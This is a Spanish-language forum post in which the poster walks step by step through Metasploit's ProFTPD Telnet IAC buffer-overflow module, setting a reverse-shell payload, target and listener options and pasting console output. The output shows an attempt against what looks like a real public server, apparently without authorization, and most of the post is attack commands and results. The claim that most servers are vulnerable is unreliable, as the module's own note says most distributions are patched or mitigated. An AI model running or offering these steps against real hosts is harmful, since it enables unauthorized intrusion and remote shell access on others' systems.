Os traigo una nueva bomba de nuestro querido metasploit.
Es un exploit que te da una shell remota en los servidores que tengan el puerto 21 abierto con la el PROFTP de servicio hasta su versión 1.3.3a... Es decir la mayoría...
No he conseguido hacerlo correr del todo por lo que pido que alguien me diga que me falla:
cargamos el exploit:
Vemos de que trata:use exploit/linux/ftp/proftp_telnet_iac
Cargamos el PAYLOAD:msf exploit(proftp_telnet_iac) > info
Name: ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
Version: 10922
Platform: Linux
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great
Provided by:
jduck <[email protected]>
Available targets:
Id Name
-- ----
0 Automatic Targeting
1 Debug
2 ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1
3 ProFTPD 1_3_3a Server (Debian) - Squeeze Beta1 (Debug)
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS [email protected] no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOST yes The target address
RPORT 21 yes The target port
Payload information:
Space: 4096
Avoid: 4 characters
Description:
This module exploits a stack-based buffer overflow in versions of
ProFTPD server between versions 1.3.2rc3 and 1.3.3b. By sending data
containing a large number of Telnet IAC commands, an attacker can
corrupt memory and execute arbitrary code. This version of the
exploit uses a little ROP stub to indirectly transfer the flow of
execution to a pool buffer (the cmd_rec "res" in "pr_cmd_read").
NOTE: Most Linux distributions either do not ship a vulnerable
version of ProFTPD, or they ship a version compiled with stack
smashing protection. As of this writing, SSP is believed to
successfully mitigate this vulnerability.
References:
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
En este caso el shell- reverse_tcpmsf exploit(proftp_telnet_iac) > set PAYLOAD
set PAYLOAD generic/debug_trap
set PAYLOAD generic/shell_bind_tcp
set PAYLOAD generic/shell_reverse_tcp
set PAYLOAD generic/tight_loop
set PAYLOAD linux/x86/adduser
set PAYLOAD linux/x86/chmod
set PAYLOAD linux/x86/exec
set PAYLOAD linux/x86/meterpreter/bind_ipv6_tcp
set PAYLOAD linux/x86/meterpreter/bind_tcp
set PAYLOAD linux/x86/meterpreter/reverse_ipv6_tcp
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set PAYLOAD linux/x86/metsvc_bind_tcp
set PAYLOAD linux/x86/metsvc_reverse_tcp
set PAYLOAD linux/x86/shell/bind_ipv6_tcp
set PAYLOAD linux/x86/shell/bind_tcp
set PAYLOAD linux/x86/shell/reverse_ipv6_tcp
set PAYLOAD linux/x86/shell/reverse_tcp
set PAYLOAD linux/x86/shell_bind_ipv6_tcp
set PAYLOAD linux/x86/shell_bind_tcp
set PAYLOAD linux/x86/shell_reverse_tcp
set PAYLOAD linux/x86/shell_reverse_tcp2
msf exploit(proftp_telnet_iac) > set PAYLOAD linux/x86/shell/reverse_tcp
PAYLOAD => linux/x86/shell/reverse_tcp
Rellenamos la IP del objetivo. Si no la sabemos basta con hacer ping a ella (ping loquesea.com):
Rellenamos el host que queremos atacar (su IP) y el puerto por el que queremos recibir la conexíón:msf exploit(proftp_telnet_iac) > set RHOST IP_WEB_OBJETIVO
RHOST => IP_WEB_OBJETIVO
msf exploit(proftp_telnet_iac) > set LHOST IP_LOCAL
LHOST => IP_LOCAL
Importante que nateemos el puerto seleccionado en LPORT a nuestra IP_LOCAL LHOSTmsf exploit(proftp_telnet_iac) > set LPORT 9001
LPORT => 9001
Todo deberá quedar así:
Lanzamos el exploit:msf exploit(proftp_telnet_iac) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS [email protected] no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOST IP_WEB_OBJETIVO yes The target address
RPORT 21 yes The target port
Payload options (linux/x86/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.131 yes The listen address
LPORT 9001 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
A mi me escupe esto:msf exploit(proftp_telnet_iac) > exploit -j
No se por que es como si no encontrase el target (objetivo). Por tanto miro que TARGETS hay:[-] Handler failed to bind to IP_WEB_OBJETIVO:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Connecting to FTP server IP_WEB_OBJETIVO:21...
[*] Connected to target FTP server.
[*] Automatically detecting the target...
[*] No matching target
[*] Exploit completed, but no session was created.
Que fallo hay??? He probado seleccionando de target el 1 (Debug) y me sale esto:msf exploit(proftp_telnet_iac) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Debug
2 ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1
3 ProFTPD 1_3_3a Server (Debian) - Squeeze Beta1 (Debug)
He puesto a escuchar al multi/handler por si me llegaba la shell pero nada...msf exploit(proftp_telnet_iac) > set TARGET 1
TARGET => 1
msf exploit(proftp_telnet_iac) > exploit
[*] Started reverse handler on 192.168.1.131:9001
[*] Connecting to FTP server 85.10.140.119:21...
[*] Connected to target FTP server.
[*] Trying target Debug...
[*] FTP Banner: 220 ProFTPD 1.3.1 Server (ProFTPD) [85.10.140.119]
[*] Your payload should have executed now...
[*] Exploit completed, but no session was created.
Que hago mal???
Un saludo!!!
PD: Esploit en exploit-db: [Enlace externo eliminado para invitados]